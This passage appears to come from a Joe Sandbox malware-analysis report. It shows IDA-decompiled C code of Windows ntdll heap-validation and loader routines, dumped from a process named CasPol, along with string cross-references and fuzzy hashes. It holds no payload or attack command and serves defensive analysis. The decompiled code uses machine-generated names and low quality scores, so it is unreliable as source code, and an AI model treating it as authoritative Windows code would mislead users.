                                                                					_t283 = E01671370(_t280, 0x1604e90);
                                                                					_pop(_t267);
                                                                					if(_t283 != 0) {
                                                                						_t245 = _v48;
                                                                						do {
                                                                							 *_t283 = 0;
                                                                							_t284 = _t283 + 2;
                                                                							E0166BB40(_t267,  &_v68, _t245);
                                                                							if(L016343C0( &_v68,  &_v24) != 0) {
                                                                								_t275 = _t275 + 1;
                                                                							}
                                                                							_t245 = _t284;
                                                                							_t283 = E01671370(_t284, 0x1604e90);
                                                                							_pop(_t267);
                                                                						} while (_t283 != 0);
                                                                						_v48 = _t245;
                                                                						_t242 = _v52;
                                                                					}
                                                                					_t224 = _v48;
                                                                					_t280 = 0;
                                                                					if( *_v48 != 0) {
                                                                						E0166BB40(_t267,  &_v68, _t224);
                                                                						if(L016343C0( &_v68,  &_v24) != 0) {
                                                                							_t275 = _t275 + 1;
                                                                						}
                                                                					}
                                                                					if(_t275 == 0) {
                                                                						L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                                                						_v40 = _t280;
                                                                						_v20 = _t280;
                                                                					}
                                                                					_t225 = _v8;
                                                                					if(_v8 != 0) {
                                                                						L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                                                					}
                                                                					_v8 = _t280;
                                                                					goto L16;
                                                                				}
                                                                			}










































                                                                0x01688254
                                                                0x00000000
                                                                0x01633e0c
                                                                0x01633e11
                                                                0x01633e16
                                                                0x01633e19
                                                                0x01633e29
                                                                0x01633e2c
                                                                0x01633e2f
                                                                0x0168825c
                                                                0x0168825f
                                                                0x01688261
                                                                0x01688264
                                                                0x0168826c
                                                                0x01688280
                                                                0x01688282
                                                                0x01688282
                                                                0x01688289
                                                                0x01688290
                                                                0x01688293
                                                                0x01688294
                                                                0x01688298
                                                                0x0168829b
                                                                0x0168829b
                                                                0x01633e35
                                                                0x01633e38
                                                                0x01633e3d
                                                                0x01633e44
                                                                0x01633e58
                                                                0x016882a3
                                                                0x016882a3
                                                                0x01633e58
                                                                0x01633e60
                                                                0x01633e6f
                                                                0x01633e74
                                                                0x01633e77
                                                                0x01633e77
                                                                0x01633e7a
                                                                0x01633e7f
                                                                0x01633e8c
                                                                0x01633e8c
                                                                0x01633e91
                                                                0x00000000
                                                                0x01633e91

                                                                Strings
                                                                • Kernel-MUI-Language-Allowed, xrefs: 01633DC0
                                                                • WindowsExcludedProcs, xrefs: 01633D6F
                                                                • Kernel-MUI-Language-Disallowed, xrefs: 01633E97
                                                                • Kernel-MUI-Language-SKU, xrefs: 01633F70
                                                                • Kernel-MUI-Number-Allowed, xrefs: 01633D8C
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                • API String ID: 0-258546922
                                                                • Opcode ID: 6725f12d423d8326447c862f200f8d537a7c31247b54521cad2ed9c7c0061660
                                                                • Instruction ID: 84063ce7a656c5c34615c87a0e3f82173667e252c1451ddaf401c219e724ee58
                                                                • Opcode Fuzzy Hash: 6725f12d423d8326447c862f200f8d537a7c31247b54521cad2ed9c7c0061660
                                                                • Instruction Fuzzy Hash: EBF13A72D00619EBCB16DF98CD80AEEBBBEFF58650F14416AE505A7350DB349E01CBA4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 29%
                                                                			E016240E1(void* __edx) {
                                                                				void* _t19;
                                                                				void* _t29;
                                                                
                                                                				_t28 = _t19;
                                                                				_t29 = __edx;
                                                                				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
                                                                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                						_push("HEAP: ");
                                                                						E0162B150();
                                                                					} else {
                                                                						E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                					}
                                                                					E0162B150("Invalid heap signature for heap at %p", _t28);
                                                                					if(_t29 != 0) {
                                                                						E0162B150(", passed to %s", _t29);
                                                                					}
                                                                					_push("\n");
                                                                					E0162B150();
                                                                					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                                						 *0x1716378 = 1;
                                                                						asm("int3");
                                                                						 *0x1716378 = 0;
                                                                					}
                                                                					return 0;
                                                                				}
                                                                				return 1;
                                                                			}






                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                                                • API String ID: 0-188067316
                                                                • Opcode ID: 4c159c11eb69f13a9dc181f861bd957682f1910306bccf1b92bddb0a063ca1e8
                                                                • Instruction ID: f1d267a009c9c3ff19f9290a593ceee4999fb9d7bc8278f5f3e1f401d788f02e
                                                                • Opcode Fuzzy Hash: 4c159c11eb69f13a9dc181f861bd957682f1910306bccf1b92bddb0a063ca1e8
                                                                • Instruction Fuzzy Hash: D7014C32142A51EED32AA76DEC0DF537BA4DB01B31F29842DF00547781CBE49494C728
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 70%
                                                                			E0164A830(intOrPtr __ecx, signed int __edx, signed short _a4) {
                                                                				void* _v5;
                                                                				signed short _v12;
                                                                				intOrPtr _v16;
                                                                				signed int _v20;
                                                                				signed short _v24;
                                                                				signed short _v28;
                                                                				signed int _v32;
                                                                				signed short _v36;
                                                                				signed int _v40;
                                                                				intOrPtr _v44;
                                                                				intOrPtr _v48;
                                                                				signed short* _v52;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				void* __ebp;
                                                                				signed int _t131;
                                                                				signed char _t134;
                                                                				signed int _t138;
                                                                				char _t141;
                                                                				signed short _t142;
                                                                				void* _t146;
                                                                				signed short _t147;
                                                                				intOrPtr* _t149;
                                                                				intOrPtr _t156;
                                                                				signed int _t167;
                                                                				signed int _t168;
                                                                				signed short* _t173;
                                                                				signed short _t174;
                                                                				intOrPtr* _t182;
                                                                				signed short _t184;
                                                                				intOrPtr* _t187;
                                                                				intOrPtr _t197;
                                                                				intOrPtr _t206;
                                                                				intOrPtr _t210;
                                                                				signed short _t211;
                                                                				intOrPtr* _t212;
                                                                				signed short _t214;
                                                                				signed int _t216;
                                                                				intOrPtr _t217;
                                                                				signed char _t225;
                                                                				signed short _t235;
                                                                				signed int _t237;
                                                                				intOrPtr* _t238;
                                                                				signed int _t242;
                                                                				unsigned int _t245;
                                                                				signed int _t251;
                                                                				intOrPtr* _t252;
                                                                				signed int _t253;
                                                                				intOrPtr* _t255;
                                                                				signed int _t256;
                                                                				void* _t257;
                                                                				void* _t260;
                                                                
                                                                				_t256 = __edx;
                                                                				_t206 = __ecx;
                                                                				_t235 = _a4;
                                                                				_v44 = __ecx;
                                                                				_v24 = _t235;
                                                                				if(_t235 == 0) {
                                                                					L41:
                                                                					return _t131;
                                                                				}
                                                                				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
                                                                				if(_t251 == 0) {
                                                                					__eflags =  *0x1718748 - 1;
                                                                					if( *0x1718748 >= 1) {
                                                                						__eflags =  *(__edx + 2) & 0x00000008;
                                                                						if(( *(__edx + 2) & 0x00000008) == 0) {
                                                                							_t110 = _t256 + 0xfff; // 0xfe7
                                                                							__eflags = (_t110 & 0xfffff000) - __edx;
                                                                							if((_t110 & 0xfffff000) != __edx) {
                                                                								_t197 =  *[fs:0x30];
                                                                								__eflags =  *(_t197 + 0xc);
                                                                								if( *(_t197 + 0xc) == 0) {
                                                                									_push("HEAP: ");
                                                                									E0162B150();
                                                                									_t260 = _t257 + 4;
                                                                								} else {
                                                                									E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                									_t260 = _t257 + 8;
                                                                								}
                                                                								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
                                                                								E0162B150();
                                                                								_t257 = _t260 + 4;
                                                                								__eflags =  *0x1717bc8;
                                                                								if(__eflags == 0) {
                                                                									E016E2073(_t206, 1, _t251, __eflags);
                                                                								}
                                                                								_t235 = _v24;
                                                                							}
                                                                						}
                                                                					}
                                                                				}
                                                                				_t134 =  *((intOrPtr*)(_t256 + 6));
                                                                				if(_t134 == 0) {
                                                                					_t210 = _t206;
                                                                					_v48 = _t206;
                                                                				} else {
                                                                					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
                                                                					_v48 = _t210;
                                                                				}
                                                                				_v5 =  *(_t256 + 2);
                                                                				do {
                                                                					if(_t235 > 0xfe00) {
                                                                						_v12 = 0xfe00;
                                                                						__eflags = _t235 - 0xfe01;
                                                                						if(_t235 == 0xfe01) {
                                                                							_v12 = 0xfdf0;
                                                                						}
                                                                						_t138 = 0;
                                                                					} else {
                                                                						_v12 = _t235 & 0x0000ffff;
                                                                						_t138 = _v5;
                                                                					}
                                                                					 *(_t256 + 2) = _t138;
                                                                					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
                                                                					_t236 =  *((intOrPtr*)(_t210 + 0x18));
                                                                					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
                                                                						_t141 = 0;
                                                                					} else {
                                                                						_t141 = (_t256 - _t210 >> 0x10) + 1;
                                                                						_v40 = _t141;
                                                                						if(_t141 >= 0xfe) {
                                                                							_push(_t210);
                                                                							E016EA80D(_t236, _t256, _t210, 0);
                                                                							_t141 = _v40;
                                                                						}
                                                                					}
                                                                					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
                                                                					 *((char*)(_t256 + 6)) = _t141;
                                                                					_t142 = _v12;
                                                                					 *_t256 = _t142;
                                                                					 *(_t256 + 3) = 0;
                                                                					_t211 = _t142 & 0x0000ffff;
                                                                					 *((char*)(_t256 + 7)) = 0;
                                                                					_v20 = _t211;
                                                                					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
                                                                						_t119 = _t256 + 0x10; // -8
                                                                						E0167D5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
                                                                						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
                                                                						_t211 = _v20;
                                                                					}
                                                                					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
                                                                					if(_t252 == 0) {
                                                                						L56:
                                                                						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
                                                                						_t146 = _t206 + 0xc0;
                                                                						goto L19;
                                                                					} else {
                                                                						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
                                                                							L15:
                                                                							_t185 = _t211;
                                                                							goto L17;
                                                                						} else {
                                                                							while(1) {
                                                                								_t187 =  *_t252;
                                                                								if(_t187 == 0) {
                                                                									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
                                                                									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
                                                                									goto L17;
                                                                								}
                                                                								_t252 = _t187;
                                                                								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
                                                                									continue;
                                                                								}
                                                                								goto L15;
                                                                							}
                                                                							while(1) {
                                                                								L17:
                                                                								_t212 = E0164AB40(_t206, _t252, 1, _t185, _t211);
                                                                								if(_t212 != 0) {
                                                                									_t146 = _t206 + 0xc0;
                                                                									break;
                                                                								}
                                                                								_t252 =  *_t252;
                                                                								_t211 = _v20;
                                                                								_t185 =  *(_t252 + 0x14);
                                                                							}
                                                                							L19:
                                                                							if(_t146 != _t212) {
                                                                								_t237 =  *(_t206 + 0x4c);
                                                                								_t253 = _v20;
                                                                								while(1) {
                                                                									__eflags = _t237;
                                                                									if(_t237 == 0) {
                                                                										_t147 =  *(_t212 - 8) & 0x0000ffff;
                                                                									} else {
                                                                										_t184 =  *(_t212 - 8);
                                                                										_t237 =  *(_t206 + 0x4c);
                                                                										__eflags = _t184 & _t237;
                                                                										if((_t184 & _t237) != 0) {
                                                                											_t184 = _t184 ^  *(_t206 + 0x50);
                                                                											__eflags = _t184;
                                                                										}
                                                                										_t147 = _t184 & 0x0000ffff;
                                                                									}
                                                                									__eflags = _t253 - (_t147 & 0x0000ffff);
                                                                									if(_t253 <= (_t147 & 0x0000ffff)) {
                                                                										goto L20;
                                                                									}
                                                                									_t212 =  *_t212;
                                                                									__eflags = _t206 + 0xc0 - _t212;
                                                                									if(_t206 + 0xc0 != _t212) {
                                                                										continue;
                                                                									} else {
                                                                										goto L20;
                                                                									}
                                                                									goto L56;
                                                                								}
                                                                							}
                                                                							L20:
                                                                							_t149 =  *((intOrPtr*)(_t212 + 4));
                                                                							_t33 = _t256 + 8; // -16
                                                                							_t238 = _t33;
                                                                							_t254 =  *_t149;
                                                                							if( *_t149 != _t212) {
                                                                								_push(_t212);
                                                                								E016EA80D(0, _t212, 0, _t254);
                                                                							} else {
                                                                								 *_t238 = _t212;
                                                                								 *((intOrPtr*)(_t238 + 4)) = _t149;
                                                                								 *_t149 = _t238;
                                                                								 *((intOrPtr*)(_t212 + 4)) = _t238;
                                                                							}
                                                                							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
                                                                							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
                                                                							if(_t255 == 0) {
                                                                								L36:
                                                                								if( *(_t206 + 0x4c) != 0) {
                                                                									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
                                                                									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
                                                                								}
                                                                								_t210 = _v48;
                                                                								_t251 = _v12 & 0x0000ffff;
                                                                								_t131 = _v20;
                                                                								_t235 = _v24 - _t131;
                                                                								_v24 = _t235;
                                                                								_t256 = _t256 + _t131 * 8;
                                                                								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
                                                                									goto L41;
                                                                								} else {
                                                                									goto L39;
                                                                								}
                                                                							} else {
                                                                								_t216 =  *_t256 & 0x0000ffff;
                                                                								_v28 = _t216;
                                                                								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
                                                                									L28:
                                                                									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
                                                                									_v32 = _t242;
                                                                									if( *((intOrPtr*)(_t255 + 8)) != 0) {
                                                                										_t167 = _t242 + _t242;
                                                                									} else {
                                                                										_t167 = _t242;
                                                                									}
                                                                									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
                                                                									_t168 = _t167 << 2;
                                                                									_v40 = _t168;
                                                                									_t206 = _v44;
                                                                									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
                                                                									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
                                                                										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
                                                                									}
                                                                									_t217 = _v16;
                                                                									if(_t217 != 0) {
                                                                										_t173 = _t217 - 8;
                                                                										_v52 = _t173;
                                                                										_t174 =  *_t173;
                                                                										__eflags =  *(_t206 + 0x4c);
                                                                										if( *(_t206 + 0x4c) != 0) {
                                                                											_t245 =  *(_t206 + 0x50) ^ _t174;
                                                                											_v36 = _t245;
                                                                											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
                                                                											__eflags = _t245 >> 0x18 - _t225;
                                                                											if(_t245 >> 0x18 != _t225) {
                                                                												_push(_t225);
                                                                												E016EA80D(_t206, _v52, 0, 0);
                                                                											}
                                                                											_t174 = _v36;
                                                                											_t217 = _v16;
                                                                											_t242 = _v32;
                                                                										}
                                                                										_v28 = _v28 - (_t174 & 0x0000ffff);
                                                                										__eflags = _v28;
                                                                										if(_v28 > 0) {
                                                                											goto L34;
                                                                										} else {
                                                                											goto L33;
                                                                										}
                                                                									} else {
                                                                										L33:
                                                                										_t58 = _t256 + 8; // -16
                                                                										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
                                                                										_t206 = _v44;
                                                                										_t217 = _v16;
                                                                										L34:
                                                                										if(_t217 == 0) {
                                                                											asm("bts eax, edx");
                                                                										}
                                                                										goto L36;
                                                                									}
                                                                								} else {
                                                                									goto L24;
                                                                								}
                                                                								while(1) {
                                                                									L24:
                                                                									_t182 =  *_t255;
                                                                									if(_t182 == 0) {
                                                                										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
                                                                										__eflags = _t216;
                                                                										goto L28;
                                                                									}
                                                                									_t255 = _t182;
                                                                									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
                                                                										continue;
                                                                									} else {
                                                                										goto L28;
                                                                									}
                                                                								}
                                                                								goto L28;
                                                                							}
                                                                						}
                                                                					}
                                                                					L39:
                                                                				} while (_t235 != 0);
                                                                				_t214 = _v12;
                                                                				_t131 =  *(_t206 + 0x54) ^ _t214;
                                                                				 *(_t256 + 4) = _t131;
                                                                				if(_t214 == 0) {
                                                                					__eflags =  *0x1718748 - 1;
                                                                					if( *0x1718748 >= 1) {
                                                                						_t127 = _t256 + 0xfff; // 0xfff
                                                                						_t131 = _t127 & 0xfffff000;
                                                                						__eflags = _t131 - _t256;
                                                                						if(_t131 != _t256) {
                                                                							_t156 =  *[fs:0x30];
                                                                							__eflags =  *(_t156 + 0xc);
                                                                							if( *(_t156 + 0xc) == 0) {
                                                                								_push("HEAP: ");
                                                                								E0162B150();
                                                                							} else {
                                                                								E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                							}
                                                                							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
                                                                							_t131 = E0162B150();
                                                                							__eflags =  *0x1717bc8;
                                                                							if(__eflags == 0) {
                                                                								_t131 = E016E2073(_t206, 1, _t251, __eflags);
                                                                							}
                                                                						}
                                                                					}
                                                                				}
                                                                				goto L41;
                                                                			}























































                                                                0x0164a983
                                                                0x0164a972
                                                                0x0164a90a
                                                                0x0164aa34
                                                                0x0164aa34
                                                                0x0164aa40
                                                                0x0164aa43
                                                                0x0164aa46
                                                                0x0164aa4d
                                                                0x016923ab
                                                                0x016923b2
                                                                0x016923b8
                                                                0x016923be
                                                                0x016923c3
                                                                0x016923c5
                                                                0x016923cb
                                                                0x016923d1
                                                                0x016923d5
                                                                0x016923f6
                                                                0x016923fb
                                                                0x016923d7
                                                                0x016923ec
                                                                0x016923f1
                                                                0x01692403
                                                                0x01692408
                                                                0x01692410
                                                                0x01692417
                                                                0x01692422
                                                                0x01692422
                                                                0x01692417
                                                                0x016923c5
                                                                0x016923b2
                                                                0x00000000

                                                                Strings
                                                                • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 01692403
                                                                • HEAP[%wZ]: , xrefs: 016922D7, 016923E7
                                                                • HEAP: , xrefs: 016922E6, 016923F6
                                                                • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 016922F3
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                • API String ID: 0-1657114761
                                                                • Opcode ID: 797aeedcdbbd17f30b254386bf4459370ec0da079ccdcceaba0ea770fbd39c76
                                                                • Instruction ID: 6cbbb5fd96b32e3e380146cec5e72e02796218d1aeac8ab3811fe86483317cba
                                                                • Opcode Fuzzy Hash: 797aeedcdbbd17f30b254386bf4459370ec0da079ccdcceaba0ea770fbd39c76
                                                                • Instruction Fuzzy Hash: 03D1C274640645AFEB19CFA8C990BBABBF6FF48300F15856DD9579B342E330A981CB50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 69%
                                                                			E0164A229(void* __ecx, void* __edx) {
                                                                				signed int _v20;
                                                                				char _v24;
                                                                				char _v28;
                                                                				void* _v44;
                                                                				void* _v48;
                                                                				void* _v56;
                                                                				void* _v60;
                                                                				void* __ebx;
                                                                				signed int _t55;
                                                                				signed int _t57;
                                                                				void* _t61;
                                                                				intOrPtr _t62;
                                                                				void* _t65;
                                                                				void* _t71;
                                                                				signed char* _t74;
                                                                				intOrPtr _t75;
                                                                				signed char* _t80;
                                                                				intOrPtr _t81;
                                                                				void* _t82;
                                                                				signed char* _t85;
                                                                				signed char _t91;
                                                                				void* _t103;
                                                                				void* _t105;
                                                                				void* _t121;
                                                                				void* _t129;
                                                                				signed int _t131;
                                                                				void* _t133;
                                                                
                                                                				_t105 = __ecx;
                                                                				_t133 = (_t131 & 0xfffffff8) - 0x1c;
                                                                				_t103 = __edx;
                                                                				_t129 = __ecx;
                                                                				E0164DF24(__edx,  &_v28, _t133);
                                                                				_t55 =  *(_t129 + 0x40) & 0x00040000;
                                                                				asm("sbb edi, edi");
                                                                				_t121 = ( ~_t55 & 0x0000003c) + 4;
                                                                				if(_t55 != 0) {
                                                                					_push(0);
                                                                					_push(0x14);
                                                                					_push( &_v24);
                                                                					_push(3);
                                                                					_push(_t129);
                                                                					_push(0xffffffff);
                                                                					_t57 = E01669730();
                                                                					__eflags = _t57;
                                                                					if(_t57 < 0) {
                                                                						L17:
                                                                						_push(_t105);
                                                                						E016EA80D(_t129, 1, _v20, 0);
                                                                						_t121 = 4;
                                                                						goto L1;
                                                                					}
                                                                					__eflags = _v20 & 0x00000060;
                                                                					if((_v20 & 0x00000060) == 0) {
                                                                						goto L17;
                                                                					}
                                                                					__eflags = _v24 - _t129;
                                                                					if(_v24 == _t129) {
                                                                						goto L1;
                                                                					}
                                                                					goto L17;
                                                                				}
                                                                				L1:
                                                                				_push(_t121);
                                                                				_push(0x1000);
                                                                				_push(_t133 + 0x14);
                                                                				_push(0);
                                                                				_push(_t133 + 0x20);
                                                                				_push(0xffffffff);
                                                                				_t61 = E01669660();
                                                                				_t122 = _t61;
                                                                				if(_t61 < 0) {
                                                                					_t62 =  *[fs:0x30];
                                                                					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
                                                                					__eflags =  *(_t62 + 0xc);
                                                                					if( *(_t62 + 0xc) == 0) {
                                                                						_push("HEAP: ");
                                                                						E0162B150();
                                                                					} else {
                                                                						E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                					}
                                                                					_push( *((intOrPtr*)(_t133 + 0xc)));
                                                                					_push( *((intOrPtr*)(_t133 + 0x14)));
                                                                					_push(_t129);
                                                                					E0162B150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
                                                                					_t65 = 0;
                                                                					L13:
                                                                					return _t65;
                                                                				}
                                                                				_t71 = E01647D50();
                                                                				_t124 = 0x7ffe0380;
                                                                				if(_t71 != 0) {
                                                                					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                				} else {
                                                                					_t74 = 0x7ffe0380;
                                                                				}
                                                                				if( *_t74 != 0) {
                                                                					_t75 =  *[fs:0x30];
                                                                					__eflags =  *(_t75 + 0x240) & 0x00000001;
                                                                					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
                                                                						E016E138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
                                                                					}
                                                                				}
                                                                				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
                                                                				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
                                                                				if(E01647D50() != 0) {
                                                                					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                				} else {
                                                                					_t80 = _t124;
                                                                				}
                                                                				if( *_t80 != 0) {
                                                                					_t81 =  *[fs:0x30];
                                                                					__eflags =  *(_t81 + 0x240) & 0x00000001;
                                                                					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
                                                                						__eflags = E01647D50();
                                                                						if(__eflags != 0) {
                                                                							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                						}
                                                                						E016E1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
                                                                					}
                                                                				}
                                                                				_t82 = E01647D50();
                                                                				_t125 = 0x7ffe038a;
                                                                				if(_t82 != 0) {
                                                                					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                                				} else {
                                                                					_t85 = 0x7ffe038a;
                                                                				}
                                                                				if( *_t85 != 0) {
                                                                					__eflags = E01647D50();
                                                                					if(__eflags != 0) {
                                                                						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                                						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                                					}
                                                                					E016E1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
                                                                				}
                                                                				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
                                                                				_t91 =  *(_t103 + 2);
                                                                				if((_t91 & 0x00000004) != 0) {
                                                                					E0167D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
                                                                					_t91 =  *(_t103 + 2);
                                                                				}
                                                                				 *(_t103 + 2) = _t91 & 0x00000017;
                                                                				_t65 = 1;
                                                                				goto L13;
                                                                			}


                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                • API String ID: 2994545307-2586055223
                                                                • Opcode ID: e1b45d452ac4524cc7bdeba4f56cc2f7012735850a25deed1f38ea4fa1280f60
                                                                • Instruction ID: d1e5a9e87a6a3a289513d56bc0cdc551f2bb00536d3e1391c7e4b603667a2cf7
                                                                • Opcode Fuzzy Hash: e1b45d452ac4524cc7bdeba4f56cc2f7012735850a25deed1f38ea4fa1280f60
                                                                • Instruction Fuzzy Hash: EB510532245682AFE712DBA8CC48F677BE9EF85760F180868F952CB391D734D805CB65
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 44%
                                                                			E01658E00(void* __ecx) {
                                                                				signed int _v8;
                                                                				char _v12;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				void* __esi;
                                                                				intOrPtr* _t32;
                                                                				intOrPtr _t35;
                                                                				intOrPtr _t43;
                                                                				void* _t46;
                                                                				intOrPtr _t47;
                                                                				void* _t48;
                                                                				signed int _t49;
                                                                				void* _t50;
                                                                				intOrPtr* _t51;
                                                                				signed int _t52;
                                                                				void* _t53;
                                                                				intOrPtr _t55;
                                                                
                                                                				_v8 =  *0x171d360 ^ _t52;
                                                                				_t49 = 0;
                                                                				_t48 = __ecx;
                                                                				_t55 =  *0x1718464; // 0x74cc0110
                                                                				if(_t55 == 0) {
                                                                					L9:
                                                                					if( !_t49 >= 0) {
                                                                						if(( *0x1715780 & 0x00000003) != 0) {
                                                                							E016A5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                                                						}
                                                                						if(( *0x1715780 & 0x00000010) != 0) {
                                                                							asm("int3");
                                                                						}
                                                                					}
                                                                					return E0166B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                                                				}
                                                                				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                                                				_t43 =  *0x1717984; // 0x11c2b60
                                                                				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
